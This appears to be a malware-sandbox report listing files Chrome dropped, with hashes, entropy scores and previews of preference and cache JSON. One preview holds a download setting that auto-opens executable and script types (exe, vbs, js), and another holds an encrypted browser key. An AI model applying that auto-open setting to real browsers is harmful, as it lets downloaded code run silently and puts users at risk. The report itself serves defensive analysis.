                                                                                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13296973600684277","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                            Entropy (8bit):4.95629898779197
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV5kjxZsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdSZsBdLJlyH7E4f3K33y
                                                                                                                                                                                                                            MD5:D5BB2F0F1694209F0C6AE5BA44DAC338
                                                                                                                                                                                                                            SHA1:41B2CDE10C8937FC9607E608AF65EDF709033350
                                                                                                                                                                                                                            SHA-256:20FC2ED4DA8AC625B83B6B84C1B88B534BC35B18DC8BD7521C66FFDABAB53738
                                                                                                                                                                                                                            SHA-512:A713918E0F88AE62AFAC2A6202107CF547B962900BCB779C7C5C2C8A228C140AAC5191A50BDAF5718EAAE91446DB21648CF2A7B967B9029AF16F13E923FD6EE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248544897343531","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                            Entropy (8bit):4.95629898779197
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV5kjxZsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdSZsBdLJlyH7E4f3K33y
                                                                                                                                                                                                                            MD5:D5BB2F0F1694209F0C6AE5BA44DAC338
                                                                                                                                                                                                                            SHA1:41B2CDE10C8937FC9607E608AF65EDF709033350
                                                                                                                                                                                                                            SHA-256:20FC2ED4DA8AC625B83B6B84C1B88B534BC35B18DC8BD7521C66FFDABAB53738
                                                                                                                                                                                                                            SHA-512:A713918E0F88AE62AFAC2A6202107CF547B962900BCB779C7C5C2C8A228C140AAC5191A50BDAF5718EAAE91446DB21648CF2A7B967B9029AF16F13E923FD6EE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248544897343531","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                            Entropy (8bit):4.958114650763609
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV59YIEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdXXEsBdLJlyH7E4f3K33y
                                                                                                                                                                                                                            MD5:F08847672DDD58749FE32FEFD1DBBAE9
                                                                                                                                                                                                                            SHA1:C4C1750B297311628D53B0D3DD473F3EDD6019E9
                                                                                                                                                                                                                            SHA-256:4165A9C7A2CA81E34A969C02FC75FFA899F49A5B04899EBA10E341C44839CC90
                                                                                                                                                                                                                            SHA-512:541C4ADF3A92398F61F1E90C9995FD9CCB668FF51F578968C6CCD73AB81AB24668D969A9F98A1B529F631022EF4A3D224D76B4EDCB656ADADB27A7E4065395A0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248544901990438","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                            Entropy (8bit):4.958114650763609
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV59YIEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdXXEsBdLJlyH7E4f3K33y
                                                                                                                                                                                                                            MD5:F08847672DDD58749FE32FEFD1DBBAE9
                                                                                                                                                                                                                            SHA1:C4C1750B297311628D53B0D3DD473F3EDD6019E9
                                                                                                                                                                                                                            SHA-256:4165A9C7A2CA81E34A969C02FC75FFA899F49A5B04899EBA10E341C44839CC90
                                                                                                                                                                                                                            SHA-512:541C4ADF3A92398F61F1E90C9995FD9CCB668FF51F578968C6CCD73AB81AB24668D969A9F98A1B529F631022EF4A3D224D76B4EDCB656ADADB27A7E4065395A0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248544901990438","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5185
                                                                                                                                                                                                                            Entropy (8bit):4.987202684090336
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:n8XbiCv1paAKIpyxk0JCKL8IiJkYnS1fd/bOTQVuwn:n8XbZ1p9PK4KIkVBR
                                                                                                                                                                                                                            MD5:F587774192BCD36F34BBE03D8B3BB754
                                                                                                                                                                                                                            SHA1:64AAEF81ECE2F937AF999C1F37CE76BC5C90CD0B
                                                                                                                                                                                                                            SHA-256:0C34FF76E269EF5CECB262F0F1AEB7E34D30AE54EB755EED485189626B780008
                                                                                                                                                                                                                            SHA-512:58E1526C7192CAE94F139163C67E83FAE8A16E71BB65301F4C05C68054910E610CA8A8908BC4245E92021E1F34D7F6C1527BDDCB13EBB618D8D430671DFEA5A0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13296973601651165","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2825
                                                                                                                                                                                                                            Entropy (8bit):4.86435102445835
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YALtdpBeMsNMHK5sJDysACs37sHWsd5/sSYMHCKs/MHCzsSOMHwsSJtFsX3RLs9D:HQxGKWDS1i/5vYGmGqOGKJ03QshS
                                                                                                                                                                                                                            MD5:95488A82D5073BDAAFC1480073FF801F
                                                                                                                                                                                                                            SHA1:E2E979B6D4A3EE16A815115C414D0A98E1DFA93F
                                                                                                                                                                                                                            SHA-256:C091AE68AFCD5EC632B2C324B983D70F722463CB4D05A3CE8D52E07AA7E5A5D6
                                                                                                                                                                                                                            SHA-512:D536466352320C5D394130A59B605617580050CDF325C4B3392D87D384C246E9D8C54FC16A247FF4B379F162536304E0D312D7781FFE245C643C5081B8BE08CD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"},{"broken_count":1,"host":"www.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248544952675493","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":32613},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248544952813644","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248544952748754","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248544952634896","port":443,"protocol_str":"quic"}],"isolation":[],"server"
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                                            MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                                            SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                                            SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                                            SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MANIFEST-000004.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                                            MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                                            SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                                            SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                                            SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MANIFEST-000004.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):2354
                                                                                                                                                                                                                            Entropy (8bit):4.905265434831656
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YALteBdpNntw3qyvTCXDHz5sSvGsSERLsS4ScSbsS2RsSvitMHJssSlAMH0bG:2lNnOa+TCXDHz5voExDci2x6tGJGuG0S
                                                                                                                                                                                                                            MD5:7E735CF579679FF87D05FB7211632226
                                                                                                                                                                                                                            SHA1:76FB72D53102873FE98B344CA93C67D2E4F05B51
                                                                                                                                                                                                                            SHA-256:B7000BAB99915CDF2737CE9398B67493B33672B3C87478C2BB3D2FD99C91521F
                                                                                                                                                                                                                            SHA-512:C64F70054C0A0883D590DCC18FD8268D3B4C7FD31ECE6DACA65E6615320F8EC08B4F35F158EE26BD764F01020769114017BDACF5E32D8AD257F494B39533D74A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"www.google.com","isolation":[],"port":443,"protocol_str":"quic"},{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):106
                                                                                                                                                                                                                            Entropy (8bit):3.138546519832722
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                                                                                            MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                                                                                            SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                                                                                            SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                                                                                            SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Yx7:4
                                                                                                                                                                                                                            MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                                                                                            SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                                                                                            SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                                                                                            SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:85.0.4183.121
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):399250
                                                                                                                                                                                                                            Entropy (8bit):6.027039574872666
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:jRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:/sdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:FB379EBB95F4913267CB06E959F5E200
                                                                                                                                                                                                                            SHA1:A0E02BDA73507629A0D5F538CD56592965B349E6
                                                                                                                                                                                                                            SHA-256:8F07953CB117DAE06A1056B226AAA6C442C70B622DC42672A786A6ADDFD7688F
                                                                                                                                                                                                                            SHA-512:942B8CA6BA9BF9D16EE3410E71EE31F5ECCC0E3103C12C8869F01ED46BF094154064FBC19E0FE23E61CD1AC09527A0384A96EF9D94868A5688D66C7073E77D8B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):95428
                                                                                                                                                                                                                            Entropy (8bit):3.7445888472480364
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:x/JWmYj5UD8iV7diFNOrbvi63RqEZH05Glcr3EyQx58YMLrzSmfr5XUmWqlOkQ2Z:5eWpJCk8NQeHc+gInv2aKM6Gx/
                                                                                                                                                                                                                            MD5:86F0CF50B16B0E8816D52E3FFF730007
                                                                                                                                                                                                                            SHA1:855CC4C96EF5AC7DC52CD94950F86B6833FDF92F
                                                                                                                                                                                                                            SHA-256:E535C23435900C5302C4026B6E8663DFCFA916C56CF9056A68019834C722382C
                                                                                                                                                                                                                            SHA-512:9E55E170C05A92BF45B0A2B1823ACD8A939EFFD21C9079400E4C4E6E1D1027040D8E7639EC15AE6709D156A672F654075B174B8231424E9186DFB22DB34F162F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...#\8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):147504
                                                                                                                                                                                                                            Entropy (8bit):4.859567224410241
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:KJ4VHTSRJJYd7eF9yBrohsNSlkSTmLzpN1VZihdfjAUoIUeFjK:A4VGJ2JoySl61edbPq
                                                                                                                                                                                                                            MD5:BC811D916CF7D8E6B13B5E63C7B6A474
                                                                                                                                                                                                                            SHA1:CCCB6EB391D88DDFCE3E3BAB3AB63AC799459484
                                                                                                                                                                                                                            SHA-256:CE9183903AA22B624FBA2877EFEE026D53EF7B38FF28D4119E70F55B7BFF79C3
                                                                                                                                                                                                                            SHA-512:158DA5CD955DA0AA16DA80A894FB277181753854A011C8CC3ECFF4075A5A4449CC85A51C17446C0096310CF897045EA549D4B21A756541335DE82E69413E9D8F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:........................4Y................................. ...X...l...h...d...0.......X...T...P...L...H.......@...<.......4...0...,.......|...`...D........... ................................)......ozama.......,"...*......g.bat........ .. *......onwod.......D...8*......ennab...........P*......nozam...........h*......geips.......H....*......rekoj...........*......lgoog............*......uotpo........#...*......lreko.......X....*..t...........|W..............PW..4W...W...V...V..XW...V..PW..LW..HW..DW...V..<W..8W..4W..0W..,W..dV..$W.. W..@V...W.. V...W...V...W...W...U...V...V...V...V...V...V...U...V...U...V..hU...V..HU...V...V...V...V...V...V...V...V...V...V...V...V...V...T...T...V...V...V...V...T..xV..tV..pV..lV...T..dV..dT..HT..XV..TV..PV.. T..HV..DV..@V..<V..8V..4V..0V..,V..(V..$V.. V...V...V...V...V...V...S...S...V...S...U...U..dS...U...U...U...U..8S...S...S...U...U...U...U...U...U...R...U...U...U...U...R...U...R..dR...U...U...U...U...U...U..|U..xU..tU..$R..lU..hU..dU..`U...Q..XU..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:SysEx File -
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):94708
                                                                                                                                                                                                                            Entropy (8bit):3.7444076693044694
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:B/JWmYj5UD8iV7diFNOrbvi63RqEZH05Glcr3EyQx58YMLrzSmfEXUmWqlOkQ2NG:peWpJCklNQeHc+gInv2aKM6Gx6
                                                                                                                                                                                                                            MD5:08DC4CCCDC96B5B881EE3527BA291B43
                                                                                                                                                                                                                            SHA1:0844F514B538D094B97F1480999DEF0F23FD941F
                                                                                                                                                                                                                            SHA-256:4DEA970431E261ECA40929C1E2857C1AAE5D183E07927B9A28A4AE4F4262C117
                                                                                                                                                                                                                            SHA-512:2C06ACD12E993295C2275028FCAB6F59D32B0E61D670C7770AA376A20C58F5505B8AE833FC52B73CB22954F56FC350A302F1F4803DC50FFA4A6998F71C6827DD
                                                                                                                                                                                                                            Malicious:false
